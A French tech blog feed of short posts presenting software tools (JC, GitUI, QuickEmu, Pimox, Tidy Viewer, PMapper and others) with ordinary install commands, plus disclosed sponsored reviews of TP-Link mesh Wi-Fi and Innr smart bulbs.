Notez que par défaut, Fig récupère de la donnée sur vos usages, mais vous pouvez facilement désactiver ça dans les paramètres en cochant la case suivante :

Hello les amis,

En général autour du mois de mars c’est un peu le mois de la lose. Ça a commencé par des galères perso il y a quelques années, ça a évolué en pandémie, puis en guerre et hier mon smartphone est tombé dans l’eau et clignote dans tous les sens ce matin. Bref, ma poisse du mois de mars commence à réellement influencer le monde.

Sachez que je m’en excuse.

Toutefois, en bon péon, je ne me laisse pas (trop) abattre et j’espère que vous non plus. Je bosse dur la journée : le blog, les Patreons, les travaux dans la maison, le jardin de l’extrême…

Le soir on s’endort avec la satisfaction d’une journée bien remplie qui se termine enfin pour se réveiller avec le seum d’une nuit bordélique qui sera suivi d’une journée à nous farcir les émotions puantes et gluantes des uns et des autres. Nos Karen, Ken et autres Vladimir se comportent comme des ados de 13 ans et nous les subissons, épuisés.

On rêve tous d’une trêve qui n’arrivera jamais. La ligne d’arrivée est sans cesse repoussée comme un mirage qui s’éloigne au fur et à mesure qu’on avance.

Heureusement, bien qu’épuisés nous sommes forts et nous sommes résilients. Nos journées sont comme des vols affrétés par Nepal Airlines : il arrive qu’elles se passent bien. Souvenons-nous-en.

Sinon, qui a besoin de vacances ici ?

Allez, force à vous !

Si vous codez ou que vous faites de la ligne de commande et que vous avez besoin de récupérer la sortie d’un outil en ligne de commande ou de fichiers type XML and co et d’exporter tout ça en JSON ou dictionnaires pour Python, j’ai ce qu’il vous faut.

Ça s’appelle JC et c’est dispo sous la forme d’un outil en ligne de commande ou d’une lib Python. Vous pouvez ainsi rediriger avec un pipe la sortie d’une commande vers JC comme ceci en précisant le parseur dig (Il y a pleins de parseurs disponibles) :

dig example.com | jc --dig

Et ainsi obtenir ça :

[{"id":38052,"opcode":"QUERY","status":"NOERROR","flags":["qr","rd","ra"],
"query_num":1,"answer_num":1,"authority_num":0,"additional_num":1,
"opt_pseudosection":{"edns":{"version":0,"flags":[],"udp":4096}},"question":
{"name":"example.com.","class":"IN","type":"A"},"answer":[{"name":
"example.com.","class":"IN","type":"A","ttl":39049,"data":"93.184.216.34"}],
"query_time":49,"server":"2600:1700:bab0:d40::1#53(2600:1700:bab0:d40::1)",
"when":"Fri Apr 16 16:09:00 PDT 2021","rcvd":56,"when_epoch":1618614540,
"when_epoch_utc":null}]

Si vous vous sentez pousser des ailes, vous pouvez même l’enchainer avec la commande jq comme ceci pour récupérer simplement une info :

dig example.com | jc --dig | jq -r '.[].answer[].data'

Très pratique pour récupérer de la data dans vos scripts Pythons ou sortir cette donnée en JSON pour ensuite l’importer ailleurs. Avec ça vous pourrez parser des commandes comme crontab, ls, free, mount, hosts, ping, ps, systemctl, tracerout ou des formats de fichiers comme le CSV, XML, YAML…etc.

Il y a même une démo en ligne si vous voulez tester avec d’installer.

Si ça vous intéresse, le dépôt Github est ici.

Merci à l__l_l_l__ pour le partage.

Que ce soit pour faire un tirage au sort dans le cadre d’un concours, pour faire encadrer les meilleures réponses ou tout simplement aller porter plainte pour harcèlement, il est toujours intéressant de pouvoir exporter en CSV / XLS…etc. les commentaires présents sous l’un de vos posts de réseaux sociaux.

Mais ce n’est pas évident ! Heureusement, avec le site Export Comments, il vous suffit de coller le lien d’un post Facebook, Twitter, Instagram, YouTube, TikTok, Twitch, Discord, Steam…etc. pour récupérer le fichier Excel ou CSV.

Il est également possible de filtrer les utilisateurs en double, de faire un export limité à certaines dates ou d’effectuer directement un tirage au sort.

Pour moins de 100 commentaires exportés par jour, c’est gratuit, sinon, il faudra passer à la caisse.

Bref, c’est pratique et c’est par ici.

Vous aimez les jeux vidéos indépendants ? Vous aimez rendre service à votre prochain ? Et vous trouvez que Vladimir n’est pas très gentil ?

Alors, soutenez l’Ukraine grâce à ce pack de 991 jeux indés disponibles pour la modique somme de 10 $. C’est évidemment sur Itch.io et si on ramène ça au prix unitaire du jeu, vous ferez 99 % d’économie et vous aurez de quoi vous occuper dans votre cave lorsque Satan 2 aura été lancé.

On y trouve par exemple SuperHot…

Crosscode…

Et Kingdom Two Crowns.

Objectif : Récolter 1 million de dollars pour assister médicalement les Ukrainiens et également venir en aide aux enfants victimes de cette guerre.`

Cool non ? Comme ça vous faites une bonne action et vous pouvez découvrir des tas de jeux super cools.

À découvrir ici.

Si vous pratiquez cette merveilleuse discipline qu’est le Bug Bounty, vous avez surement déjà une boite à outils bien pratique. Mais si vous débutez, la bonne nouvelle c’est que le hacker éthique Kamil Vavra a compilé une « Awesome List » comme seul Github peut en héberger.

Cette liste contient tous les outils pour faire de la reconnaissance de sous domaines, de technologies, de ports…etc et également de l’exploitation type injection de commande, injection SQL, XSS, XXE, File Inclusion…etc.

Vous en aurez pour des heures à regarder et tester tout ça et je pense qu’ensuite ça vous fera gagner un max de temps.

A découvrir ici.

Il y a quelque temps, je vous avais présenté une interface graphique (GUI) pour Git mais l’inconvénient des interfaces graphiques, c’est qu’elles ne sont en général pas dans le terminal.

Mais si malgré les astuces que je vous ai données pour débuter avec Git ne rentrent pas dans votre cerveau tout mou ou si trouver la bonne commande git en fonction de ce que vous voulez faire est un périple, je vous propose de tester GitUI.

C’est une interface pour Git qui se pilote au clavier et qui fonctionne dans le terminal. Pas besoin de mémoriser des tas de raccourcis clavier, il suffit de sélectionner la bonne commande avec les touches de votre clavier et hop ! A vous les commits, les inspections de code, les stages, les push, les créations de branches et j’en passe.

Comparé à LazyGit, GitUI est plus rapide et prend moins de place en mémoire.

Pour l’installer sous macOS :

brew install gitui

Pour Windows, il faudra utiliser Scoop ou Chocolatey. Et pour Linux, tout est expliqué là.

Si vous avez du mal à vous lancer dans certaines tâches, et que vous êtes facilement sujet à la procrastination, pas de panique. Vous connaissez sans doute des petites astuces comme découper de grosses tâches en plus petites ou encore bosser pendant 20 minutes et faire 5 minutes de pause en mode pomodoro.

Go For It fonctionne sous Linux et reprends un peu tout ça en vous proposant une todo liste basique combinée avec un compte à rebours afin de vous aider à rester concentrer sur votre tâche. Tic tac tic tac….

Une fois la tâche accomplie, vous cliquez sur le bouton « Done » et vous pouvez passer à la tâche suivante.

Go For It vous permettra de vous mettre un petit pied au cul pour avancer dans votre boulot. Par contre, ça ne fonctionnera bien que si vous découpez vraiment en petits bouts vos tâches. Un timer de 8h30 pour effectuer une action aura peu de sens.

À découvrir ici

Helio est un séquenceur musical léger et totalement gratuit, qui fonctionne sous Linux, macOS, Windows, iOS et Android et qui permet de composer de la musique sans distraction grâce à son interface totalement épurée.

L’interface est un peu déroutante au premier abord, mais permet de composer dans un piano roll en midi. Côté instruments et plugins, il n’y a rien de prévu alors ce sera à vous d’importer vos instruments (VST…etc.).

Helio intègre même un assistant pour vous aider à composer de bons accords…

Vous pourrez ensuite arranger chaque piste comme bon vous semble et exporter le projet ou l’audio facilement.

Un système de contrôle de version est également disponible, ce qui permet de revenir facilement en arrière ou de faire différentes versions de vos morceaux.

Helio est vraiment un outil pensé pour libérer votre créativité en vous affranchissant de la richesse des DAW traditionnels. Rien que l’essentiel pour écrire de la musique.

Le logiciel est libre et téléchargeable ici et vous pouvez retrouver la documentation ici.

Si vous êtes développeur et que vous cherchez un moyen simple d’automatiser certaines actions comme générer des builds de vos applications, il y a sûrement autant de méthodes que de développeurs. Même chose si vous êtes administrateur système ou tout simplement utilisateur de Linux.

L’une d’entre elle s’appelle Wakeci, un outil qui grâce à des fichiers de configuration YAML permet de paramétrer pour lancer des tâches répétitives d’un simple clic.

Rien à installer, il suffit de lancer le binaire et d’aller lire l’exemple de création de fichiers YAML qui contient tous les blocs dont vous avez besoin. Voici un exemple de config :

desc: Build and release wake application
params:
  - VERSION: master

tasks:
  - name: Clone repository
    run: git clone git@github.com:jsnjack/wakeci.git --recursive

  - name: Checkout version
    run: sh ${WAKE_CONFIG_DIR}utils/checkout.sh wakeci ${VERSION}

  - name: Install npm dependencies
    run: cd wakeci/src/frontend && npm install

  - name: Build application
    run: cd wakeci && make build

  - name: Create a release on github
    run: python ${WAKE_CONFIG_DIR}utils/release_on_github.py -f wakeci/bin/wakeci -r jsnjack/wakeci -t "v`cd wakeci && monova`"

timeout: 10m

on_failed:
  - name: Send notification to Slack
    run: >-
      python ${WAKE_CONFIG_DIR}utils/notify_slack.py
      -t "Job ${WAKE_JOB_NAME} has failed <${WAKE_URL}build/${WAKE_BUILD_ID}|#${WAKE_BUILD_ID}>"
      -k error

on_finished:
  - name: Send notification to Slack
    run: >-
      python ${WAKE_CONFIG_DIR}utils/notify_slack.py
      -t "New wake version `cd wakeci && monova` <${WAKE_URL}build/${WAKE_BUILD_ID}|#${WAKE_BUILD_ID}>"
      -k ok

Wakeci dispose d’une interface web et peut générer automatiquement des certificats SSL à l’aide de Let’s Encrypt. Pas de plugins, rien de compliqué… Simplement le déroulement de vos tâches dans un fichier YAML qui tel un scénario se lancera dès que vous en aurez besoin.

Si ça vous intéresse, c’est par ici.

— En partenariat avec TP-Link —

Comme il n’y a pas vraiment de réseau Ethernet chez moi et que j’ai une maison un peu tordue avec de gros murs, le wifi de ma box Orange n’était pas vraiment une option. Heureusement, TP-Link m’a envoyé un pack de 3 modules AX1800 de sa gamme Deco qui m’a permis de mettre en place super facilement un réseau wifi mesh chez moi.

Alors oui, appeler « Deco » des appareils qui permettent de se connecter à Internet, il fallait oser ! Mais c’est ça aussi que j’aime chez TP-Link.

Le pack AX1800 Deco X20 se compose donc de 3 boitiers blancs de petite taille et au look épuré qui fonctionnent en réseau mesh et permettent d’étendre le réseau wifi.

Placés à bonne distance des uns des autres, ces boitiers créent un maillage wifi ce qui me permet d’avoir un réseau sécurisé, stable et suffisamment puissant dans toute la maison, peu importe l’endroit où je me trouve.

Vous pouvez utiliser les boitiers comme routeur ou simplement point d’accès pour étendre la couverture sans fil d’un réseau existant.

Et vous pouvez également brancher des appareils en Ethernet derrière si besoin.

Comme ils sont en Wifi 6, les vitesses de transmissions peuvent atteindre 1,8 Gb/s, ce qui me permet de faire chauffer le streaming (Netflix and co) ou de streamer, n’importe où y compris en extérieur (sur la terrasse).

Le fait que ce soit du réseau mesh permet surtout d’avoir un réseau wifi unique transparent pour tous les appareils de la maison. Vos appareils basculeront de point d’accès en point d’accès sans coupure au lieu de perdre la connexion d’un point d’accès pour se reconnecter à un autre ensuite.

Évidemment, vous aurez par défaut du réseau 5 GHz, mais vous pouvez également activer un 2,4 GHz. Et si vous recevez du monde ou de la clientèle, vous pouvez même créer un réseau « Invité » qui segmentera le trafic.

Le Wifi 6 augmente d’ailleurs drastiquement la couverture du réseau avec une promesse de 540 m2 couvert grâce aux 3 boitiers. Comme toute la gamme Deco est compatible entre elle, j’ai pu également laisser mes M9 Plus pour augmenter encore plus la portée. J’en ai même mis un à la cave pour avoir du réseau quand je bricole : Il me faut un peu de débit quand je regarde une vidéo YouTube qui m’explique comment démonter un ballon d’eau chaude 🙂

Concernant l’application, elle permet de gérer l’ensemble des appareils connectés au réseau, il y aussi des options de sécurisation, de contrôle parental ou de QoS et surtout, une fonctionnalité que j’aime beaucoup qui permet d’optimiser le trafic sur les boitiers Deco pour plus de fluidité.

Bref, je suis super content de ces boitiers qui sont discrets et qui apportent de la stabilité et de la vitesse malgré les distances ou l’épaisseur des murs. Et le fait de pouvoir rajouter des Deco de manière transparente en cas de besoin, même si les modèles sont différents, c’est hyper cool. Mon mélange avec des M9 Plus et des X20 se passe très bien.

Si vous galérez avec votre wifi, que la connexion est faible ou instable, la gamme des Deco est vraiment une option que vous devriez envisager. Il y en a pour tous les budgets en fonction de la surface à couvrir.

En tout cas, après 6 mois d’utilisation, j’en suis très content !

Les Deco X20 sont disponibles ici.

Je ne sais pas si vous manipulez souvent des fichiers CSV mais sans tableur type Excel ou OpenOffice, c’est compliqué d’avoir un rendu correct.

Enfin, c’était compliqué puisque maintenant les amateurs d’interface en ligne de commande et de Terminal (Linux, macOS et même Windows) vont pouvoir visualiser proprement et avec de jolies couleurs, les fichiers CSV.

Cela est possible grâce à l’outil Tidy Viewer, tv pour les intimes qui une fois installé se lance comme ceci :

tv fichier.csv

On peut voir sur la capture ci-dessous un premier affichage d’un CSV avec la commande cat. C’est moche et illisible. Et juste en dessous le rendu obtenu avec tv.

C’est beau, c’est clair, c’est émouvant. Tidy Viewer sait automatiquement mettre en forme les chiffres, reconnaît le titre des colonnes, adapte le rendu à la taille du terminal et est capable de tronquer les chaînes de caractères trop longues.

Évidemment, tout est personnalisable et vous pourrez même paramétrer votre propre thème pour un rendu aux petits oignons.

Pour installer Tidy Viewer sous Debian, ça se passe comme ça :

wget https://github.com/alexhallam/tv/releases/download/<VERSION>/tidy-viewer_<VERSION>_amd64.deb
sudo dpkg -i tidy-viewer_<VERSION>_amd64.deb
echo "alias tv='tidy-viewer'" >> ~/.bashrc
source ~/.bashrc

Et sous macOS c’est comme ça :

brew tap alexhallam/tidy-viewer
brew install tidy-viewer

Plus d’infos ici.

Nombreux sont ceux qui ont été trahis par les métadonnées… Coordonnées GPS sur une photo, nom d’une personne dans document Word, adresse IP ou nom d’une entreprise dans un PowerPoint et j’en passe.

Si vous êtes soucieux des traces que vous laissez en ligne, je vous invite fortement à faire le ménage dans les métadonnées des fichiers que vous partagez.

Comment ? Et bien sous Linux, le logiciel Metadata Cleaner vous aidera à visualiser et effacer toutes ces informations sensibles.

Il suffit d’installer l’outil avec Flatpak puis de lui indiquer les fichiers à nettoyer. Cliquez ensuite sur le bouton rouge « Clean » et vos documents seront automatiquement vidés de toutes informations permettant de remonter jusqu’à vous.

Par contre, conservez bien une copie de vos fichiers avant de les passer à la moulinette, on ne sait jamais.

Si vous utilisez les services d’Amazon et notamment AWS, vous faites sûrement appel à IAM pour gérer les identités et les accès liés à votre organisation.

Seulement voilà, la moins erreur de configuration et un attaquant aurait vite fait d’escalader les privilèges et accéder à des morceaux réservés de vos applications.

Pour réduire le risque, NCC Group a mis en ligne Principal Manager (PMapper), un script (+ une lib) qui permet d’identifier les risques en analysant la configuration IAM. Pour cela, l’outil modélise les différents utilisateurs et les rôles qui leur sont attribués sous la forme d’un graphe.

Cela vous permet ensuite de vérifier s’il est alors possible d’escalader des privilèges ou prendre d’autres chemins pour accéder à une ressource ou une action réservée sur AWS. PMapper vérifie également si l’utilisateur ou le rôle de celui-ci peut accéder à d’autres utilisateurs ou rôles qui auront à leur tout accès à cette action ou ressource.

Grâce à PMapper, vous pourriez ainsi détecter des scénarios où un utilisateur n’aurait pas l’autorisation de lire un objet S3, mais pourrait détourner cela en lançant une instance Amazon EC2 qui pourrait lire cet objet S3.

Bref, un petit script bien malin dont vous pourrez intégrer la lib facilement à vos propres outils.

+ d’infos ici.

Si vous êtes sous macOS et que vous avez besoin d’optimiser des images afin de réduire leur taille, vous connaissez forcement ImageOptim et ses dérivés dont je vous parle souvent.

Mais un nouvel outil libre vient de faire son apparition sur Github qui devrait vous plaire. Il s’agit de Image Optimizer, qui utilise les libs mozjpeg, pngquant, gifsicle et SVGO pour vous aider à réduire le poids d’images aux formats variés : GIF, PNG, JPEG et…. SVG !

Vous glissez déposez une image ou un répertoire contenant des images, et hop, toutes les fichiers verront leur poids être diminué.

Ah si seulement on pouvait perdre du poids nous-même aussi facilement…

A télécharger ici.

— Test réalisé en partenariat avec Innr —

Les ampoules connectées, c’est toujours un concept qui m’a plu. Si vous n’êtes pas familier avec la domotique, vous pourriez vous demander à quoi ça sert de domotiser des ampoules ?

Et bien, il y a tellement de cas d’usage que ce serait dommage de ne pas le faire. Et même si vous n’avez pas de hub domotique, vous pouvez quand même connecter votre éclairage facilement.

Par exemple, les ampoules Innr que je teste depuis quelques mois sont vraiment super pour ça. Ce sont des ampoules Wifi qui existent en 2 gammes : Bulb Comfort et Bulb Colour.

L’ajout au réseau wifi se fait très simplement. Lors de son initialisation, l’ampoule propose un réseau wifi temporaire auquel l’application Innr se connecte. Vous devez alors scanner le QR Code sur l’ampoule puis sélectionner votre réseau wifi habituel pour que l’ampoule puisse s’y connecter. Et voilà !

Ensuite, à l’aide de l’application, vous pouvez par exemple régler la luminosité mais également la chaleur ou la couleur de l’ampoule. On peut aller par exemple de 1800 Kelvins à 6500 Kelvins. Cela peut vous permettre de vous mettre dans une ambiance lumière du jour quand vous travaillez. Et le soir, dans une ambiance lumineuse un peu plus chaude.

Si vous voulez créer une ambiance, celles qui changent de couleur vous permettront également d’inonder la pièce de bleu, vert, rose…etc. A vous de voir ce que vous aimez. Les streamers Twitch, les gamers, les développeurs, les musiciens…etc sont très friands de ces ambiances colorées car cela peut influer sur la créativité, l’énergie ou l’humeur.

Les ampoules fonctionnent avec des LEDs et sont donc très économiques (A+) et on une durée de vie de plus de 25 000 heures, soit 2,8 années théorique de fonctionnement non-stop.

Mais tout l’intérêt de ces ampoules réside dans le fait qu’il est possible de créer des scénarios avec l’application. Ainsi, vous pouvez déclencher des allumages automatiques en fonction des moments de la journée, avec évidemment les paramètres qui vous plaisent.

Vous travaillez ? La scène « Boulot » vous proposera une lumière bien blanche, bien naturelle. Vous lisez ? Vous aurez une lumière plus douce mais quand même lumineuse avec la scène « Lire ». « Relax » quand a lui vous proposera une lumière très douce et très chaude. Vous avez des enfants ? « Veilleuse » permet d’avoir une lumière très faible qui ne perturbera pas le sommeil.

Ensuite, il y a des scènes plus funs comme « Cerisier » qui vous fera voir la vie en rose. « Arc en ciel » qui enchaînera toutes les couleurs. Ou encore « Cheminée » qui scintillera chaudement comme le ferait un bon feu dans la cheminée.

Vous pouvez également créer vos propres scènes et y associer plusieurs ampoules pour par exemple mettre toute la maison dans une seule ambiance ou certaines pièces avec telle scène et d’autres avec une autre scène. Par contre, vous ne pourrez pas faire des enchaînements complexes de couleurs par exemple, comme on peut le faire sur certains rubans à LEDs.

Une fois toutes vos scènes paramétrées, vous pourrez alors les lancer à la voix avec Siri, Alexa ou encore Google Assistant vu que l’application est compatible.

Vous pouvez même automatiser leur lancement en fonction des heures de la journée ou selon les heures de lever et coucher du soleil. Pratique pour se réveiller en douceur avec la lumière ou vous faire comprendre qu’il est bientôt l’heure d’aller au lit.

Et si vous partez de chez vous, sachez qu’un mode « Vacances » permet de simuler de façon aléatoire des allumages et des extinctions d’éclairage selon certaines heures. Génial pour faire croire que vous êtes chez vous en fin de journée.

Celles que j’ai testé sont des ampoules de type E27 (le gros culot qui se visse) mais il en existe aussi à douille, type spots GU10 ou en E14 pour les lampes de chevets. Ils ont même des lampes d’extérieur ou à filaments pour un aspect plus vintage.

Sachez également que Innr propose aussi certaines ampoules compatibles avec le standard domotique Zigbee, donc choisissez bien vos modèles.

J’ai trouvé ces ampoules connectées très plaisantes car elles me permettent d’adapter la luminosité à différents moments et ambiances de la journée. Et le fait que je puisse les utiliser également pour la sécurité de mon domicile est également un gros plus !

Je vous invite à découvrir la boutique Innr ici.

J’sais pas si vous avez une Nintendo Switch, mais ce qui est cool avec les consoles, c’est que si vous en avez marre de jouer, vous appuyez sur le bouton off et cela va suspendre l’OS et le jeu auquel vous êtes en train de jouer. C’est une mise en veille qui permet de ne pas perdre votre partie en cours et c’est super pratique.

Et si je vous disais maintenant qu’on peut faire exactement la même chose sous Linux et Windows. A savoir mettre en suspend n’importe quel logiciel à tout moment, pour économiser des ressources systèmes, et pouvoir le reprendre tout simplement plus tard.

Pour cela, il suffit de télécharger et installer Nyrna sous Windows ou Linux en cliquant ici.

Cela fonctionnera donc pour les jeux mais également tout type d’applications y compris celles qui font du traitement (encodage de vidéo, compilation de logiciel, rendu 3D…etc).

Ainsi, vous pourrez récupérer des ressources CPU et GPU (mais pas la RAM) sans perdre ce que vous étiez en train de faire.

Par contre, attention, ça ne permet pas de récupérer l’application après un reboot par exemple ou après un vidage de RAM (spoiler : l’application suspendue est stockée en mémoire vive comme vous vous en doutez).

Si vous aimez jouer avec des machines virtuelles, ça vous dirait de remplacer ce bon vieux VirtualBox par Qemu ?

« Oui mais Qemu c’est compliqué », vous allez me dire. Et bien non, si vous utilisez QuickEmu.

Ce script pour Linux permet de créer et de faire tourner des VM desktop Linux, macOS et Windows avec simplement 2 commandes. L’objectif étant de permettre facilement de tester des distribs sans logiciel trop lourd.

Mais avant, pour installer Quickemu sous Ubuntu, ajoutez le dépôt suivant :

sudo apt-add-repository ppa:flexiondotorg/quickemu
sudo apt update
sudo apt install quickemu

Mais vous pouvez également récupérer les sources, toutefois y’a pas mal de dépendances à installer.

Ensuite pour créer la VM, lancez quickget suivi de l’OS que vous voulez + son parfum.

quickget ubuntu-mate impish

Et lancez la vm comme ceci :

quickemu --vm ubuntu-mate-impish.conf

Bon, là c’est pour un Linux. D’ailleurs, voici les Linux supportés :

• kubuntu
• lubuntu
• ubuntu-budgie
• ubuntu-kylin
• ubuntu-mate
• ubuntu-studio
• xubuntu
• alma
• archlinux
• debian
• elementary
• fedora
• garuda
• kali
• kdeneon
• linuxmint
• nixos
• opensuse
• oraclelinux
• popos
• regolith
• rockylinux
• zorin

Et vous pouvez également télécharger une ISO et faire votre fichier de conf maison comme ceci en spécifiant l’image de démarrage (qcow2 dans l’exemple) et l’ISO :

guest_os="linux"
disk_img="debian-bullseye/disk.qcow2"
iso="debian-bullseye/firmware-11.0.0-amd64-DVD-1.iso"

Et si vous voulez lancer un Windows 11, c’est comme ceci :

quickget windows 11
quickemu --vm windows-11.conf

Et pour macOS (Catalina dans l’exemple) :

quickget macos catalina
quickemu --vm macos-catalina.conf

Et même punition pour FreeBSD…

quickget freebsd 13_0
quickemu --vm freebsd-13_0.conf

Et pour ceux qui n’aiment vraiment pas la ligne de commande, un autre développeur a mis au point une interface graphique pour Quickemu qui s’appelle Quickgui.

Si vous êtes sous Linux, et que vous utilisez systemd, vous avez peut-être déjà croisé le chemin de la commande journalctl qui permet de voir et manipuler les logs de systemd.

Bien que journalctl permette grâce à quelques paramètres d’afficher ce qu’on cherche, ce n’est pas non plus très pratique, surtout quand on sait qu’il y a énormément de logiciels et services différents qui se déversent dans les logs de systemd.

Alors que faire ?

Et bien il y a un programme nommé QJournalctl qui est tout simplement une interface pour exploiter au mieux journalctl et les logs de systemd.

Pour installer et utiliser QJournalctrl il faut récupérer les sources sur le Github suivant :

git clone https://github.com/pentix/qjournalctl.git

puis générer les fichiers nécessaires à la compilation comme ceci :

./autogen.sh

Puis compiler le machine comme ceci :

make -j5

Et l’installer comme ceci :

sudo make install

Vous aurez alors la possibilité de chercher dans les logs systemd en spécifiant des dates / heures, des mots clés, la priorité de l’alerte…etc.

Est ce qu’avant de mettre une photo ou une capture d’écran en ligne, vous pensez toujours à bien retirer les informations personnelles qui s’y trouvent ? Je ne parle pas des données Exif mais vraiment de ce qui apparait sur l’image. Un mot de passe, une plaque d’immatriculation, une adresse…etc.

En temps normal, il faut utiliser un outil de retouche photo pour flouter ou pixeliser des morceaux de l’image. En général, j’aime bien remplacer par des gros carrés noirs, c’est plus efficace.

Mais si vous choisissez l’option plus esthétique des pixels, et que vous avez la flemme de lancer Photoshop (ou clone de…), il y a le site Redact.photo qui vous permet de recadrer une image mais également d’en flouter certaines parties. C’est assez limité car on ne peut flouter qu’avec des rectangles (pas de ronds ou de formes libres)

Ça peut vous faire gagner du temps et rassurez vous rien n’est uploadé en clair sur leurs serveurs. Tout le traitement se passe dans votre navigateur.

Et dans le même genre, si vous voulez flouter automatiquement des visages sur une vidéo, c’est par ici.

Si vous êtes familier avec les serveurs de machines virtuelles, vous connaissez forcement Proxmox. Proposé gratuitement, Proxmox est un hyperviseur qui utilise KVM pour prendre en charge quasiment tous les systèmes d’exploitation. Proxmox permet donc de gérer tout cela et également de réaliser des snapshot et des backups de vos machines virtuelles.

Seulement, voilà. Pour Proxmox il vous faudra un serveur afin d’héberger et de faire tourner vos VMs. Si vous n’avez pas de machine à dispo ou de budget pour vous faire héberger, il est toujours possible d’utiliser des Raspberry Pi 4 en serveur Proxmox.

Comment ?

Et bien grâce à Pimox, un portage de Proxmox pour le Raspberry Pi.

Cet outil vous permettra de créer un cluster Proxmox composé de Raspberry Pi ou d’un cluster hybride Raspberry Pi + machines x86.

Pour préparer une carte SD avec Pimox, vous devrez flasher cette carte avec la dernière version de raspiOS. Puis une fois connecté au Pi avec votre terminal, lancer la commande suivante pour récupérer le script d’install :

sudo -s

curl https://raw.githubusercontent.com/pimox/pimox7/master/RPiOS64-IA-Install.sh > RPiOS64-IA-Install.sh

Rendre ensuite le script exécutable comme ceci :

chmod +x RPiOS64-IA-Install.sh

Et enfin le lancer. Vous n’aurez plus qu’à suivre les étapes d’installation.

./RPiOS64-IA-Install.sh

Si vous organisez des réunions, des conférences téléphones ou des grosses teufs avec champagne et cluster de covid, il est pratique de pouvoir proposer à vos invités d’ajouter cet événement dans leur calendrier. Pour cela, aujourd’hui je vous propose un script qui s’appelle Add To Calendar Button. Il s’agit tout simplement d’un petit bout de JavaScript qui une fois paramétré et inséré dans vos pages web ressemblera à ceci :

Le code de ce script fonctionnera sur desktop et mobile et peut être entièrement paramétré et traduit comme bon vous semble. Il permet d’ajouter une invitation dans les calendriers les plus connus (Google Calendar, Yahoo Calendar, Microsoft 365 et Outlook calendar sans oublier la génération de fichiers iCal / ICS pour les autres calendriers comme celui d’Apple.

Pour mettre en place ce bout de code, téléchargez-le depuis le dépôt Github. Ensuite, copiez les fichiers présents dans le dossier assets sur votre site, puis intégrez ces fichiers à votre page comme ceci :

<link rel="stylesheet" href="./assets/css/atcb.min.css">

<script src="./assets/js/atcb.min.js" defer></script>

Puis créez un bouton comme ceci :

<div class="atcb" style="display:none;">
  {
    "name":Le titre de l'événement",
    "startDate":"02-21-2022",
    "endDate":"03-24-2022",
    "options":[
      "Google"
    ]
  }
</div>

On a la une configuration minimale, mais sachez que vous pouvez ajouter beaucoup plus d’options comme ceci :

<div class="atcb" style="display:none;">
  {
    "name":"Le titre de votre événement",
    "description":"Une petite description",
    "startDate":"02-21-2022",
    "endDate":"03-24-2022",
    "startTime":"10:13",
    "endTime":"17:57",
    "location":"Roubaix",
    "label":"Ajouter au calendrier",
    "options":[
      "Apple",
      "Google",
      "iCal",
      "Microsoft365",
      "Outlook.com",
      "Yahoo"
    ],
    "timeZone":"Europe/Berlin",
    "timeZoneOffset":"+01:00",
    "trigger":"click",
    "iCalFileName":"Reminder-Event"
  }
</div>

Je vous invite vraiment à lire la documentation pour intégrer facilement ce genre de petit bouton.

Aujourd’hui, je vous propose de découvrir KASM, un outil qui utilise Docker et qui une fois installé sur votre serveur, vous permettra d’utiliser du Linux ou des applications directement depuis votre navigateur.

Un peu comme un Citrix ou du Terminal Server sauf que là c’est gratuit et c’est vous qui auto-hébergez le machin. Et ça fonctionne avec pleins d’applications… Ubuntu, VLC, OnlyOffice, Visual Studio, Doom…etc.

Je vous laisse découvrir tout ça. Bonne fin de semaine à tous et encore merci pour votre soutien sur Patreon.

Si vous suivez des gens intéressants sur Twitter (il parait qu’il en reste quelques uns), vous aurez peut-être envie d’exporter certains de leurs messages pour les positionner dans un article de blog, les repartager sur d’autres réseaux voire pourquoi pas les imprimer et les encadrer.

C’est là qu’entre en scène Poet.so, un site hyper minimaliste qui permet à partir d’une simple URL d’un tweet, d’avoir une jolie mise en avant du message à télécharger en PNG.

Vous choisissez la couleur du fond, le thème sombre ou clair, si vous voulez afficher le compteur de likes ou tout simplement la taille du cadre. Et voilà le résultat :

Chouette non ? Je trouve même ça encore mieux que l’intégration native de Twitter qui si le tweet est supprimé, ne permet plus d’afficher le message dans une page web.

A découvrir ici.

Si vous en avez assez de votre terminal, je vous présente Tabby. Ce terminal open source et libre pour macOS, Windows et Linux est entièrement configurable et vous permettra de vous connecter soit en local, soit via le port série soit en Telnet et SSH et vous fera gagner du temps grâce à ses raccourcis clavier et rendra également votre quotidien plus agréable.

Tabby propose des onglets et un système de panneaux, mais également des thèmes, des plugins et des palettes de couleurs pour vous permettre de pousser au bout l’expérience. Il peut supporter différents shells dans la même fenêtre, offre de la complétion, intègre un conteneur chiffré pour vos mots de passe, clés SSH et autres secrets, et peut gérer différents profils de connexions.

Chaque onglet est persistent (vous pouvez les restaurer si vous en fermez un par erreur) et dispose d’un système de notifications, ce qui permettra de vous avertir si par exemple un traitement est terminé pendant que vous êtes en train de tapoter dans un autre onglet.

C’est vraiment un super terminal qui viendra facilement remplacer cmd.exe pour les Windowsiens ou votre terminal de d’habitude. Et il peut même fonctionner en version portable pour ceux qui aiment embarquer leurs outils sur clé USB.

Pour le tester, vous pouvez le télécharger, mais il existe également une version web. Pratique pour se faire une idée.

Vous vous souvenez de ce site qui permettait de transformer un visage en poupée satanique ? Et bien aujourd’hui, c’est un peu la même recette sauf qu’on va fabriquer un zombie.

Pour cela, il suffit de vous rendre sur Make Me A Zombie, d’uploader une photo et de cliquer sur le bouton « Make me a Zombie ».

Alors voici la photo originale du BG :

Et voici le résultat en Zombie :

Ah ils vont faire moins les malins, les martiens !

Make Me A Zombie est à essayer d’urgence avec une photo de votre belle-mère !

Bon, les réseaux sociaux, tout le monde voit ce que c’est, je pense. Et vous savez aussi surement que sur les réseaux sociaux grand public, Twitter en tête, il y a de la modération. Ceux qui aiment outrepasser la loi parlent même de CENSURE (!!).

Mais sans aller jusque là, c’est vrai que c’est toujours un peu dérangeant d’être sur une plateforme qui peut du jour au lendemain décider de supprimer votre compte ou l’un de vos tweets sans prévenir.

C’est moche.

Heureusement, des développeurs amateurs de logiciels libres travaillent nuit et jour à nous libérer des GAFAM. Il y a bien sûr le réseau Fédiverse et son client Mastodon que vous connaissez sûrement, mais le fonctionnement en Fédiverse fait de ce réseau, un truc encore un peu trop centralisé pour l’utilisateur final. En effet, les serveurs peuvent se faire fermer…

Pour remédier à cela, il existe 2 projets merveilleux qui sont tout simplement des clones de Twitter totalement décentralisés et bien sûr incensurables.

ScuttleButt

